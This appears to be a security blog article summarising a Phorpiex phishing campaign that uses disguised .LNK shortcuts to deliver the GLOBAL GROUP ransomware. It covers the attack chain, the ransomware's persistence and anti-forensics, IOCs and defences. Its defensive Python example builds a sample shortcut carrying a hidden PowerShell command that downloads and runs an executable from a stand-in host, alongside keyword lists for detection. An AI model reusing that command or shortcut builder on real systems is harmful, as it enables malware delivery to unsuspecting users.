Phishing remains one of the most effective initial access vectors in modern intrusion campaigns, and a recently disclosed campaign shows how long-lived malware infrastructure (the Phorpiex botnet, active since 2010) is still being used to deliver ransomware through a deceptively simple file format. Researchers from Forcepoint X-Labs recently unpacked this attack chain, which combines social engineering, “Living off the Land” (LotL) techniques, and an offline-capable ransomware payload dubbed GLOBAL GROUP.

1. Phorpiex: Persistent Malware-as-a-Service Platform
Phorpiex — also known as Trik — is a highly modular botnet first observed in 2010. It acts as a malware-as-a-service (MaaS) distribution platform, historically used for spamming, malware delivery, cryptomining, and extortion. Its modular design allows it to deliver arbitrary secondary payloads, including ransomware.
In this campaign, Phorpiex is the delivery mechanism: phishing emails carrying a seemingly innocuous attachment trigger a download and execution chain that results in ransomware deployment.
2. Attack Overview: Weaponised .LNK Files
2.1 Phishing Email and Social Engineering
The campaign uses simple subject lines such as “Your Document” to lure recipients into opening an attachment. The attachment is not a Word document but a Windows Shortcut (.LNK) file with a double extension (e.g., Document.doc.lnk). Explorer never displays the .lnk extension of a shortcut (the .lnk file type is registered with the NeverShowExt flag), so the file is listed as Document.doc even for users who have turned on “show file extensions”; to the victim it appears to be a benign .doc.
The attackers also extract icons from legitimate Windows system libraries such as shell32.dll to visually mimic familiar document icons, further reinforcing the deception.
2.2 Execution Flow
Upon user interaction, the shortcut’s malicious payload executes silently in the background. The execution path is multi-stage, designed to evade static signature detection and leverages built-in Windows utilities:
- Shortcut execution: clicking the .lnk runs cmd.exe with embedded arguments.
- PowerShell invocation: the command interpreter invokes PowerShell to download a secondary payload over HTTP/HTTPS.
- Payload drop and execution: the downloaded executable (often named to resemble a system component, e.g., C:\Windows\windrv.exe) is written to disk and then executed using PowerShell’s Start-Process.
- Ransomware activation: execution passes control to the ransomware, which begins its encryption routine on the victim host.
This chain is silent by design: no installer runs, no window is shown (a shortcut can ask for a minimised console), and every stage before the final payload executes inside trusted, Microsoft-signed binaries (cmd.exe, PowerShell), so controls that trust a process by publisher or path alone do not stop it.
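Triage of such an attachment starts with reading the shortcut itself rather than double-clicking it. The following is an added example, not code from the Forcepoint report: a minimal parser for the MS-SHLLINK header and StringData fields, plus the heuristics a mail-gateway or sandbox rule would apply (double extension, a LOLBin target, download/execution keywords in the arguments, an icon borrowed from shell32.dll, a minimised window). The sample shortcut is constructed in the block; the URL example.invalid, the icon index and the exact PowerShell one-liner are assumptions for illustration, with windrv.exe taken from the description above. For real files, compare the output against a mature tool such as LECmd or pylnk3.

```python
import re
import struct

# Added example: minimal MS-SHLLINK (.lnk) reader and lure heuristics.
# Not code from the report; the sample shortcut below is constructed here.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_FMT = "<I16sIIQQQIiIHHII"                                 # ShellLinkHeader, 76 bytes
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))                    # spec order
LOLBINS = ("cmd", "powershell", "pwsh", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32")
DOWNLOAD_HINTS = ("http://", "https://", "iwr", "invoke-webrequest",
                  "downloadstring", "downloadfile", "start-process", "-enc")


def build_sample_lnk(relative_path, working_dir, arguments, icon_location,
                     icon_index, show_cmd=1):
    """Construct a .lnk with a header and four Unicode StringData fields."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack(HEADER_FMT, 0x4C, LINK_CLSID, flags, 0x20,  # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, 0, icon_index, show_cmd, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments, icon_location))
    return header + body


def parse_lnk(data):
    """Return header fields and StringData of a Shell Link as a dict."""
    if len(data) < 0x4C:
        raise ValueError("too short for a Shell Link header")
    (size, clsid, flags, _attrs, _ctime, _atime, _wtime, _fsize, icon_index,
     show_cmd, _hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    off = 0x4C
    if flags & HAS_IDLIST:                       # skip LinkTargetIDList
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINKINFO:                     # skip LinkInfo
        (linkinfo_size,) = struct.unpack_from("<I", data, off)
        off += linkinfo_size
    info = {"icon_index": icon_index, "show_command": show_cmd}
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, off)
            off += 2
            raw = data[off:off + (count * 2 if unicode else count)]
            off += len(raw)
            info[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return info


def assess_lnk(filename, info):
    """Heuristics for the lure pattern described above; returns findings."""
    findings = []
    shown = filename[:-4] if filename.lower().endswith(".lnk") else filename
    if "." in shown:                             # Explorer lists it as 'Document.doc'
        findings.append(f"double extension: displays as '{shown}'")
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    findings += [f"invokes {b}" for b in LOLBINS if re.search(rf"\b{b}(\.exe)?\b", target)]
    if any(h in target for h in DOWNLOAD_HINTS):
        findings.append("arguments contain download/execution hints")
    if info.get("icon_location", "").lower().endswith(("shell32.dll", "imageres.dll")):
        findings.append("icon borrowed from a system DLL")
    if info.get("show_command") in (2, 7):       # SW_SHOWMINIMIZED / SW_SHOWMINNOACTIVE
        findings.append("window starts minimised")
    return findings


if __name__ == "__main__":
    lnk = build_sample_lnk(
        r"..\..\..\Windows\System32\cmd.exe", r"C:\Windows\System32",
        r'/c powershell -w hidden -c "iwr http://example.invalid/p -OutFile C:\Windows\windrv.exe; Start-Process C:\Windows\windrv.exe"',
        r"%SystemRoot%\System32\shell32.dll", 1, show_cmd=7)
    for finding in assess_lnk("Document.doc.lnk", parse_lnk(lnk)):
        print("-", finding)
```

The parser skips the optional LinkTargetIDList and LinkInfo structures by their declared sizes; for a shortcut that uses an IDList target instead of a relative path, the executable name lives inside the IDList and would need the PIDL walked as well.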
3. GLOBAL GROUP Ransomware: Offline, Mute, and Self-Contained
Unlike many modern ransomware families, GLOBAL GROUP ransomware is designed to operate fully offline. Rather than contacting a command-and-control (C2) server to retrieve encryption keys or instructions, it generates everything locally on the compromised system.
This design works under several constraints:
- Offline execution: The ransomware does not require an active external connection — enabling execution in segmented or air-gapped environments.
- Local key generation: Encryption keys are produced on the host, removing the need to interact with remote infrastructure.
- No exfiltration: Despite ransom notes claiming otherwise, GLOBAL GROUP does not perform data exfiltration as part of its core routine.
This “mute” behaviour reduces characteristic network traffic that defenders commonly monitor to detect ransomware operations, making host-level indicators critical for detection.
4. Deep Technical Behaviour and Forensic Signals
Forcepoint’s analysis reveals several notable embedded behaviours and defensive telemetry markers within the GLOBAL GROUP ransomware binary:
4.1 Execution Cleanup and Anti-Forensics
- The ransomware delays its own removal with a timer built from repeated ICMP echo requests to the loopback address (the familiar ping-based sleep in a cmd.exe one-liner), so the deletion command only runs once the main binary has finished its work.
- It then removes its original binary from disk, hindering forensic reconstruction.
4.2 Process Enumeration and Anti-Analysis
The ransomware includes anti-virtualisation and anti-analysis functionality. It enumerates running processes and exits silently if it detects sandbox environments or common analysis tools, thwarting automated detection ecosystems.
4.3 Persistence and Lateral Movement
- Post-encryption, the malware copies itself to %windir%\Temp\cleanup.exe and creates a Windows service to maintain persistence.
- A scheduled task (“CoolTask”) is created and triggered immediately, then removed to minimise footprint while the service retains persistence.
- Advanced capabilities include LDAP queries to enumerate Active Directory objects, enabling potential propagation across domain networks.
4.4 File Processing and Ransom Note
- Files are encrypted with ChaCha20-Poly1305, an authenticated encryption with associated data (AEAD) scheme: any modification of the ciphertext fails authentication, and without the key material held by the attackers the files cannot be recovered.
- Encrypted files receive the .Reco extension, and a ransom note (README.Reco.txt) is dropped.
5. Indicators of Compromise (IOCs)
From Forcepoint’s report, defenders can track several key IOCs tied to this campaign:
- LNK attachment hash (Document.zip.lnk, 64-hex SHA-256): 70a4afab44d6a9ecd7f42ab77972be074dec8383a47a2011eb0133a230a4fae3
- Payload URLs:
- Mutex identifier: Global\Fxo16jmdgujs437
- Encrypted file extension: .Reco
- File marker: xcrydtednotstill_amazingg_time!!
These IOCs belong in endpoint detection and response (EDR) watchlists and forensic triage checklists. File hashes and download URLs are cheap for the operators to rotate between waves, so pair them with the mutex, extension and file-marker matches and with the behavioural detections below.
6. Defensive Recommendations
Given the sophistication of execution via trusted processes and offline ransomware deployment, defenders should consider:
- Attachment filtering that blocks or quarantines suspicious or unconventional file types (e.g., .lnk) regardless of how the file is named or what it is wrapped in.
- Behavioural monitoring for anomalous PowerShell, cmd.exe, or downloader activity, and for executables launched from non-standard paths.
- Host-based indicators such as unusual mutex activity, unexpected service or scheduled-task creation, and file system artefacts (e.g., .Reco extensions).
- User education focusing on extension visibility and on the visual cues (familiar icons, hidden extensions) that social engineering exploits to deceive recipients.
Conclusion
This incident underscores how legacy malware infrastructure like Phorpiex still fuels current ransomware threats by combining old-school social engineering with modern defence evasion. The offline, self-contained nature of GLOBAL GROUP ransomware highlights the need for endpoint and host-centric telemetry, not merely network monitoring, to detect and disrupt such campaigns.
